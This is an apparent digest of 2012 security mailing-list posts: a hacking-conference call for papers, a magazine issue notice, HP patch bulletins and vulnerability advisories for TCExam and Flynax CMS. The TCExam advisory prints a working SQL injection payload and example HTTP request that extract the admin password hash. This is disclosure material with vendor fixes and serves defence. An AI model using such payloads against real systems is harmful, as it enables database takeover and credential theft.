GreHack 2012 - LAST Call For Papers (Grenoble, France) till 15th August 2012
-- *GreHack 2012* LAST Call For Papers .. till 15th August 2012. -- http://grehack.org GreHack 2012 conference will take place in Grenoble (Alps), France on October 19th-20th 2012 and brings together students, academia, industry and government to exchange knowledge around emerging issues in the security + hacking world. During the night, a Capture The Flag will take place. Each paper is peer reviewed at least 3 times. - *Suggested Topics (not limited to)* - http://grehack.org/en/index.php/GreHack_2012-Call_For_Papers-english/ - Track: ethical, legal and philosophical -- greyhat hacking: a consumer advance, or a risk for worldwide security? -- current state of laws relative to cyber-security and hacking + justified suggestions of modifications - Track: technical -- Hadopi: why is it a technical and legal failure? how to exploit in memory vulnerabilities of Hadopi approved software? -- In Memory Vulnerabilities --- Windows 8: heap analysis, kernel structures and new memory protections --- Exploit Corner: come present us your last sploit! -- Hardcore Penetration Testing --- Code obfuscation to complicate Reverse Engineering --- Discrete Attacks (eg: without writing on the filesystem) --- Hypervisor evasion --- Vulnerabilities and exploits on defensive security tools (eg: AntiMalwares, Firewalls, IDS) -- Attacking Infrastructures --- Internet: how to root your ***box? Which security functionalities (and properties) are provided? How to bypass them? --- ipsec, ipv6 --- routing protocols --- wireless: 802.11, réseaux 3G, 4G, WiMAX, RFID --- sensor networks -- Malwares and Botnets --- state of the art of botnets redundancy mechanism --- self-code modification (polymorphism) of malwares --- ability of antimalwares to detect slighly mutated samples --- vulnerabilities in antimalwares drivers - Track: research -- Learning and Offensive Security --- static and dynamic analysis --- dumb/simple/basic fuzzing and smart-fuzzing for automating vulnerability detection --- metrics for exploitability of vulns (in memory, web) --- model checking --- advances in reverse-engineering automation and model inference --- concolic execution -- Hardware Attacks --- nanotechnology --- fault injection in memory via laser --- smart cards --- transportations --- medical tools --- embedded malwares -- Cryptology --- influence of the environment on PRNG entropy --- mathematic aspects in current cryptology -- Defensive Security --- Trust Based Computing --- New Access Control Models for processes isolation --- New H/W + S/W for increasing the cost of exploitation *Remark* - We highly encourage original topics that break with traditional research directions - We will favor presentations with tools demonstrations or results - *Important Dates* - - CFP Opens: 1st May 2012 - CFP Closing Date: EXTENDED to 15th August 2012 (due to several requests. was initially 15th July 2012) - Final speakers List online: 09 September 2012 - Conference Dates: 19 October 2012 9am-7pm - Capture The Flag: night (19 October 2012 9pm till 20 October 2012 6am Paris time :) - *Program Committee* - - Dan Alloun (Intel) - Florent Autreau (Mataru) - Claude Castelluccia (INRIA) - Fabien Duchene (LIG) - Philippe Elbaz-Vincent (UJF) - Karim Hossen (LIG) - Pascal Lafoucarde (VERIMAG) - Arnaud Maillet (Evidian RD, Ensimag student) - Pascal Malterre (CEA) - Sanjay Rawat (LIG) - Guillaume Touron (Ensimag student) - Marie-Laure Potet (VERIMAG) - anonymous researcher (private company in vulnerability research) - *Invited Talks* - - Eric Freyssinet (LIP6, Gendarmerie) Botnet: From Observation to Investigation - Christophe Devine (ANSSI) mobile telephony security: a compared study. till what degree can we trust mobile operating systems and radio protocols? - Philippe Elbaz-Vincent (UJF) attacks on randomness of hardware Prime Random Number Generator - Regis Leveugle (TIMA) attacks on secure hardware - Kostya Kortchinsky (Microsoft and formerly Immunity Inc.) - TBA - *Speaker Benefits* - - Free pass to the conference - Accommodation during the Conference (1 night) - GreHack will participate to travel expenses (limited budget) - *Submission Guidelines* - Call for Papers is open till 15th August 2012. Consider submitting even if your topic is not listed above. http://grehack.org/index.php/GreHack_2012-Call_For_Papers-english send your submission to: grehack-program_committee _A_T_ car-online.fr - *Capture The Flag* - http://grehack.org/index.php/GreHack-2012-Capture_The_Flag_rules-english
[Announcement] ClubHack Magazine's Aug 2012 Issue Released
Hello Readers, ClubHack Magazine's Issue 31 - August 2012 is here. This issue covers following articles:- 0x00 Tech Gyan - Malware Memory Forensics 0x01 Tool Gyan - Tamper Data 0x02 Mom's Guide - Apple iOS vulnerabilities 0x03 Legal Gyan - VARIOUS AUTHORITIES UNDER THE IT ACT 0x04 Matriux Vibhag - Matriux Ec-Centric 0x05 Poster - Security by luck, not possible PDF version can be download from:- http://www.chmag.in/issue/aug2012.pdf Check http://chmag.in/ for all the articles. Articles, Feedback suggestions are welcome. Please send your bouquets or brickbats to i...@chmag.in -- Regards, Team CHMag http://chmag.in
TCExam Edit SQL Injection
/---\ | TCExam Edit SQL Injection | \---/ Summary === TCExam 11.3.007 is prone to a SQL injection flaw located in tce_edit_answer.php and tce_edit_question.php. These files pass a 'subject_module_id' parameter into a SQL statement without satisfactory sanitisation. An attacker with authoring permissions could leverage this vulnerability to take full control of the database. CVE number: CVE-2012-4237 Impact: High Vendor homepage: http://www.tcexam.org/ Vendor notified: 06/08/2012 Vendor fixed: 06/08/2012 Credit: Chris Cooper of Reaction Information Security (http://www.reactionis.co.uk/) This advisory is posted at: http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html Affected Products Confirmed in TCExam 11.3.007. Prior versions may also be affected. Details === The 'subject_module_id' parameters in the tce_edit_answer.php and tce_edit_question.php pages were found to be subject to a SQL injection vulnerability. It was possible to inject arbitrary SQL statements into a WHERE clause, retrieving information from the database via the page output. The attacker must be authenticated as a valid user with a permission level of 5 or above in order for the attack to be successful. The following payload will extract the admin password hash (some characters may need to be URL encoded): 99.9 union all select (select concat(0x7e,0x27,tce_users.user_password,0x27,0x7e) from `tcexam`.tce_users where tce_users.user_name = CHAR(97,100,109,105,110) limit 0,1) ,0x0,0x0,0x0,0x0,0x0-- --- Example Request: +--- GET /TCExam/admin/code/tce_edit_answer.php?subject_module_id=99.9+union+all+ select+%28select+concat%280x7e%2C0x27%2Ctce_users.user_password%2C0x27%2C0x7 e%29+from+%60tcexam%60.tce_users+where+tce_users.user_name+%3d+CHAR(97,100,1 09,105,110)+limit+0%2C1%29+%2C0x0%2C0x0%2C0x0%2C0x0%2C0x0--question_subject _id=3answer_question_id=7 HTTP/1.1 Host: 192.168.0.6 Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df --- Example Response: + --- SNIP --- select name=question_subject_id id=question_subject_id size=0 onchange=document.getElementById('form_answereditor').changesubject.value=1 ; document.getElementById('form_answereditor').submit(); title=test topic option value=~'c574b5b09ab10f4f39ae9dce6d539cf0'~1. - [%00]/option /select --- SNIP --- Impact == An authenticated user with a permission level of 5 or higher could take full control of the database, essentially allowing them to escalate their privileges by either directly controlling the database, cracking an administrator password or potentially changing their own permission level. Furthermore, an attacker might be able to leverage this vulnerability in order to further compromise the host machine. Solution Upgrade to TCExam 11.3.008. Distribution In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients. * bugtraq () securityfocus com * full-disclosure () lists grok org uk Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates: http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html == Reaction Information Security Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF Phone: +44 (0)1227 785050 Email: research () reactionis {dot} co {dot} uk Web: http://www.reactionpenetrationtesting.co.uk
[security bulletin] HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03447824 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03447824 Version: 1 HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-08-13 Last Updated: 2012-08-13 Potential Security Impact: Remote unauthenticated disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Fortify Software Security Center. The vulnerability could be remotely exploited to allow unauthenticated disclosure of information. References: CVE-2012-3248, FLC01 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on Windows, Linux and Solaris BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-3248(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to security-al...@hp.com RESOLUTION HP has provided patches for HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP Fortify support at fortifytechsupp...@hp.com to receive instructions on how to download the patches. HISTORY Version:1 (rev.1) - 13 August 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAlApNA4ACgkQ4B86/C0qfVnHngCcCK7g6DUKLL2Y17qv5EjzZjXM wm8AoMCpGpka9JsF+OTfrWcJDDfBdlUr =GAbD -END PGP SIGNATURE-
[security bulletin] HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote Disclosure of Privileged Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03447895 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03447895 Version: 1 HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote Disclosure of Privileged Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-08-13 Last Updated: 2012-08-13 Potential Security Impact: Remote disclosure of privileged information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Fortify Software Security Center. The vulnerability could be remotely exploited to allow disclosure of privileged information. References: CVE-2012-3249, FLC02 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on Windows, Linux and Solaris BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-3249(AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to security-al...@hp.com RESOLUTION HP has provided patches for HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP Fortify support at fortifytechsupp...@hp.com to receive instructions on how to download the patches. HISTORY Version:1 (rev.1) - 13 August 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAlApOTwACgkQ4B86/C0qfVltowCfYhdJ12AVyNXUDwAMssvCvHu3 O/EAn1ABGtPFd2/EekJxvSMBzg1XyX6J =Rb/z -END PGP SIGNATURE-
[security bulletin] HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03447828 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03447828 Version: 1 HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-08-13 Last Updated: 2012-08-13 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Service Manager and HP Service Center Server. The vulnerability could be remotely exploited resulting in a Denial of Service (DoS). References: CVE-2012-3250 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Service Manager Server 9.30, 9.21, and 7.11. HP Service Center Server 6.28. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-3250(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following patch kits available to resolve these vulnerabilities. HP Product Versions Platform / Patch Kit URL SM9.30P4 Server Windows Server 9.30.274 p4 http://support.openview.hp.com/selfsolve/document/KM1415197?searchIdentifier =-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415197res ultsURL=%2fselfsolve%2fpatchesallowReturn=true HP Itanium Server 9.30.274 p4 http://support.openview.hp.com/selfsolve/document/KM1415199?searchIdentifier =-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415199res ultsURL=%2fselfsolve%2fpatchesallowReturn=true Linux Server 9.30.274 p4 http://support.openview.hp.com/selfsolve/document/KM1415195?searchIdentifier =-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415195res ultsURL=%2fselfsolve%2fpatchesallowReturn=true Solaris Server 9.30.274 p4 http://support.openview.hp.com/selfsolve/document/KM1415192?searchIdentifier =-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415192res ultsURL=%2fselfsolve%2fpatchesallowReturn=true AIX Server 9.30.274 p4 http://support.openview.hp.com/selfsolve/document/KM1415201?searchIdentifier =-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415201res ultsURL=%2fselfsolve%2fpatchesallowReturn=true SM9.21P5 Server Windows Server 9.21.013 http://support.openview.hp.com/selfsolve/document/KM1036626?searchIdentifier =-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1036626res ultsURL=%2fselfsolve%2fpatchesallowReturn=true HP Itanium Server 9.21.290 p5 http://support.openview.hp.com/selfsolve/document/KM1396806?searchIdentifier =-72890797%3a138eb464d5e%3a62d5resultType=documentdocumentURL=KM1396806res ultsURL=%2fselfsolve%2fpatchesallowReturn=true HP parisc Server 9.21.290 p5 http://support.openview.hp.com/selfsolve/document/KM1396804?searchIdentifier =-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1396804res ultsURL=%2fselfsolve%2fpatchesallowReturn=true Linux Server 9.21.290 p5 http://support.openview.hp.com/selfsolve/document/KM1396802?searchIdentifier =-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1396802res ultsURL=%2fselfsolve%2fpatchesallowReturn=true Solaris Server 9.21.290 p5 http://support.openview.hp.com/selfsolve/document/KM1396801?searchIdentifier =-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1396801res ultsURL=%2fselfsolve%2fpatchesallowReturn=true AIX Server 9.21.290 p5 http://support.openview.hp.com/selfsolve/document/KM1396808?searchIdentifier =-72890797%3a138eb464d5e%3a62d5resultType=documentdocumentURL=KM1396808res ultsURL=%2fselfsolve%2fpatchesallowReturn=true SM7.11P19 Server Windows Server 7.11.532 p19 http://support.openview.hp.com/selfsolve/document/KM1448273?searchIdentifier =-72890797%3a138eb464d5e%3a6481resultType=documentdocumentURL=KM1448273res ultsURL=%2fselfsolve%2fpatchesallowReturn=true HP Itanium Server 7.11.532 p19 http://support.openview.hp.com/selfsolve/document/KM1448276?searchIdentifier =-72890797%3a138eb464d5e%3a6481resultType=documentdocumentURL=KM1448276res ultsURL=%2fselfsolve%2fpatchesallowReturn=true HP parisc Server 7.11.532 p19 http://support.openview.hp.com/selfsolve/document/KM1448274?searchIdentifier =-72890797%3a138eb464d5e%3a6481resultType=documentdocumentURL=KM1448274res ultsURL=%2fselfsolve%2fpatchesallowReturn=true Linux x86 Server 7.11.532 p19 http://support.openview.hp.com/selfsolve/document/KM1448277?searchIdentifier
[security bulletin] HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web Tier, Remote Cross Site Scripting (XSS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03450382 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03450382 Version: 1 HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web Tier, Remote Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-08-13 Last Updated: 2012-08-13 Potential Security Impact: Remote cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Service Manager and HP Service Center Web Tier. The vulnerability could be remotely exploited resulting in cross site scripting (XSS). References: CVE-2012-3251 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Service Manager Web Tier 9.30, 9.21, and 7.11. HP Service Center Web Tier 6.28. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-3251(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following patch kits available to resolve these vulnerabilities. HP Product Versions Patch Kit URL SM9.30P4 Web Tier http://support.openview.hp.com/selfsolve/document/KM1415193?searchIdentifier =-72890797%3a138eb464d5e%3a5a08resultType=documentdocumentURL=KM1415193res ultsURL=%2fselfsolve%2fpatchesallowReturn=true SM9.21p5 Web Tier http://support.openview.hp.com/selfsolve/document/KM1396812?searchIdentifier =-72890797%3a138eb464d5e%3a5a66resultType=documentdocumentURL=KM1396812res ultsURL=%2fselfsolve%2fpatchesallowReturn=true SM7.11p19 Web Tier http://support.openview.hp.com/selfsolve/document/KM1448272?searchIdentifier =-72890797%3a138eb464d5e%3a5957resultType=documentdocumentURL=KM1448272res ultsURL=%2fselfsolve%2fpatchesallowReturn=true SC6.2.8.10 Web Tier http://support.openview.hp.com/selfsolve/document/KM1320938?searchIdentifier =-72890797%3a138eb464d5e%3a5a86resultType=documentdocumentURL=KM1320938res ultsURL=%2fselfsolve%2fpatchesallowReturn=true HISTORY Version:1 (rev.1) - 13 August 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux)
[security bulletin] HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03441075 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03441075 Version: 1 HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-08-13 Last Updated: 2012-08-13 - - Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities. References: CVE-2012-0508, CVE-2012-0551, CVE-2012-1711, CVE-2012-1713, CVE-2012-1716, CVE-2012-1718, CVE-2012-1719, CVE-2012-1720, CVE-2012-1721, CVE-2012-1722, CVE-2012-1723, CVE-2012-1724, CVE-2012-1725, CVE-2012-1726 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE 7.0.02 and 6.0.15 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-0508(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-0551(AV:N/AC:M/Au:N/C:P/I:P/A:N)5.8 CVE-2012-1711(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5 CVE-2012-1713(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1716(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1718(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0 CVE-2012-1719(AV:N/AC:L/Au:N/C:N/I:P/A:N)5.0 CVE-2012-1720(AV:L/AC:H/Au:N/C:P/I:P/A:P)3.7 CVE-2012-1721(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1722(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1723(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1724(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0 CVE-2012-1725(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1726(AV:N/AC:L/Au:N/C:P/I:P/A:N)6.4 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following Java version upgrade to resolve these vulnerabilities. The upgrade is available from the following location http://www.hp.com/go/java HP-UX B.11.23, B.11.31 / JDK and JRE v7.0.02 or subsequent HP-UX B.11.23, B.11.31 / JDK and JRE v6.0.15 or subsequent HP-UX B.11.11, B.11.23 / JDK and JRE v6.0.15 or subsequent MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.02 or subsequent For Java v6.0 update to Java v6.0.15 or subsequent PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.23 HP-UX B.11.31 === Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.02.00 or subsequent HP-UX B.11.23 HP-UX B.11.31 === Jdk60.JDK60-COM Jdk60.JDK60-DEMO Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.15.00 or subsequent HP-UX B.11.11 HP-UX B.11.23 === Jdk60.JDK60-COM Jdk60.JDK60-DEMO Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W Jre60.JRE60-COM Jre60.JRE60-COM-DOC Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS action: install revision 1.6.0.15.00 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 13 August 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to
Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities
Title: == Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities Date: = 2012-07-13 References: === http://www.vulnerability-lab.com/get_content.php?id=659 VL-ID: = 659 Common Vulnerability Scoring System: 8.3 Introduction: = Choosing Flynax General Classifieds software allows you to set up any classifieds website. It is not designed for a particular niche so it can be adjusted to any idea of a classifieds website. This gives you a chance to choose the any niche for your classifieds website. For example you may create a classifieds website which will base on local classifieds with job ads, sport goods, motorbikes, bicycles or be oriented on all ideas in one website. Using General classifieds software with plugins you may create that classifieds website which you desire to have. (Copy of the Vendor Homepage: http://www.flynax.com/general-classifieds-software.html ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Flynax General Classifieds v4.0 CMS. Report-Timeline: 2012-07-13: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: 1.1 A SQL Injection vulnerability is detected in the Flynax General Classifieds v4.0 Content Management System. Remote attackers without privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the general module with the bound vulnerable sort_by parameter. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Exploitation requires no user inter action without privileged user account. Vulnerable Module(s): [+] General Vulnerable Parameter(s): [+] sort_by 1.2 Multiple persistent input validation vulnerabilities are detected in the Flynax General Classifieds v4.0 Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in Administrators, User Account Categories add/list modules with the bound vulnerable titel username parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged user account. Vulnerable Module(s): [+] Common Administrators Add an Administrator Listing [+] User Accounts Add an User Account Listing [+] Categories Add a Category Listing Vulnerable Parameter(s): [+] Username 